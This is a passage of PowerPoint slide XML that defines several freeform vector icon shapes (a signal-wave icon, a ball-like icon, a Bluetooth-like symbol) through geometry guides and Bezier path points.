                <a:gd name="T32" fmla="*/ 30792 w 58"/>
                <a:gd name="T33" fmla="*/ 93115 h 58"/>
                <a:gd name="T34" fmla="*/ 30792 w 58"/>
                <a:gd name="T35" fmla="*/ 103461 h 58"/>
                <a:gd name="T36" fmla="*/ 75270 w 58"/>
                <a:gd name="T37" fmla="*/ 151743 h 58"/>
                <a:gd name="T38" fmla="*/ 88955 w 58"/>
                <a:gd name="T39" fmla="*/ 151743 h 58"/>
                <a:gd name="T40" fmla="*/ 167646 w 58"/>
                <a:gd name="T41" fmla="*/ 72423 h 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8" h="58">
                  <a:moveTo>
                    <a:pt x="58" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="47" y="58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5" y="58"/>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="4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53" y="0"/>
                    <a:pt x="58" y="4"/>
                    <a:pt x="58" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="18"/>
                    <a:pt x="49" y="17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4" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="42" y="13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4" y="22"/>
                    <a:pt x="13" y="23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8"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="9" y="30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3" y="45"/>
                    <a:pt x="25" y="45"/>
                    <a:pt x="26" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49" y="2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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00080F5-AB70-4A18-96ED-06D761FEA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3729092" y="3468970"/>
            <a:ext cx="354131" cy="303951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 142082 w 178"/>
              <a:gd name="T1" fmla="*/ 0 h 168"/>
              <a:gd name="T2" fmla="*/ 284163 w 178"/>
              <a:gd name="T3" fmla="*/ 60684 h 168"/>
              <a:gd name="T4" fmla="*/ 260217 w 178"/>
              <a:gd name="T5" fmla="*/ 91026 h 168"/>
              <a:gd name="T6" fmla="*/ 142082 w 178"/>
              <a:gd name="T7" fmla="*/ 38327 h 168"/>
              <a:gd name="T8" fmla="*/ 23946 w 178"/>
              <a:gd name="T9" fmla="*/ 91026 h 168"/>
              <a:gd name="T10" fmla="*/ 0 w 178"/>
              <a:gd name="T11" fmla="*/ 60684 h 168"/>
              <a:gd name="T12" fmla="*/ 142082 w 178"/>
              <a:gd name="T13" fmla="*/ 0 h 168"/>
              <a:gd name="T14" fmla="*/ 142082 w 178"/>
              <a:gd name="T15" fmla="*/ 95817 h 168"/>
              <a:gd name="T16" fmla="*/ 225095 w 178"/>
              <a:gd name="T17" fmla="*/ 138934 h 168"/>
              <a:gd name="T18" fmla="*/ 204342 w 178"/>
              <a:gd name="T19" fmla="*/ 166082 h 168"/>
              <a:gd name="T20" fmla="*/ 142082 w 178"/>
              <a:gd name="T21" fmla="*/ 134144 h 168"/>
              <a:gd name="T22" fmla="*/ 79821 w 178"/>
              <a:gd name="T23" fmla="*/ 166082 h 168"/>
              <a:gd name="T24" fmla="*/ 59068 w 178"/>
              <a:gd name="T25" fmla="*/ 138934 h 168"/>
              <a:gd name="T26" fmla="*/ 142082 w 178"/>
              <a:gd name="T27" fmla="*/ 95817 h 168"/>
              <a:gd name="T28" fmla="*/ 142082 w 178"/>
              <a:gd name="T29" fmla="*/ 191634 h 168"/>
              <a:gd name="T30" fmla="*/ 180396 w 178"/>
              <a:gd name="T31" fmla="*/ 229960 h 168"/>
              <a:gd name="T32" fmla="*/ 142082 w 178"/>
              <a:gd name="T33" fmla="*/ 268287 h 168"/>
              <a:gd name="T34" fmla="*/ 103767 w 178"/>
              <a:gd name="T35" fmla="*/ 229960 h 168"/>
              <a:gd name="T36" fmla="*/ 142082 w 178"/>
              <a:gd name="T37" fmla="*/ 191634 h 16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78" h="168">
                <a:moveTo>
                  <a:pt x="89" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="0"/>
                  <a:pt x="156" y="15"/>
                  <a:pt x="178" y="38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45" y="37"/>
                  <a:pt x="119" y="24"/>
                  <a:pt x="89" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="24"/>
                  <a:pt x="33" y="37"/>
                  <a:pt x="15" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="15"/>
                  <a:pt x="54" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="60"/>
                  <a:pt x="129" y="71"/>
                  <a:pt x="141" y="87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19" y="92"/>
                  <a:pt x="105" y="84"/>
                  <a:pt x="89" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="84"/>
                  <a:pt x="59" y="92"/>
                  <a:pt x="50" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="68" y="60"/>
                  <a:pt x="89" y="60"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="120"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="120"/>
                  <a:pt x="113" y="131"/>
                  <a:pt x="113" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="157"/>
                  <a:pt x="102" y="168"/>
                  <a:pt x="89" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="168"/>
                  <a:pt x="65" y="157"/>
                  <a:pt x="65" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="131"/>
                  <a:pt x="76" y="120"/>
                  <a:pt x="89" y="120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2" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA836F-6FC0-4F24-B06E-5ADA0E3ACA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281" y="5000730"/>
            <a:ext cx="291473" cy="313875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854E4B31-FC87-4904-AF59-18E894A73CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8923113" y="4301357"/>
            <a:ext cx="275459" cy="336378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="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4" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA559715-1923-43C9-B40A-C2309DA2909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8029450" y="2603366"/>
            <a:ext cx="303353" cy="353750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
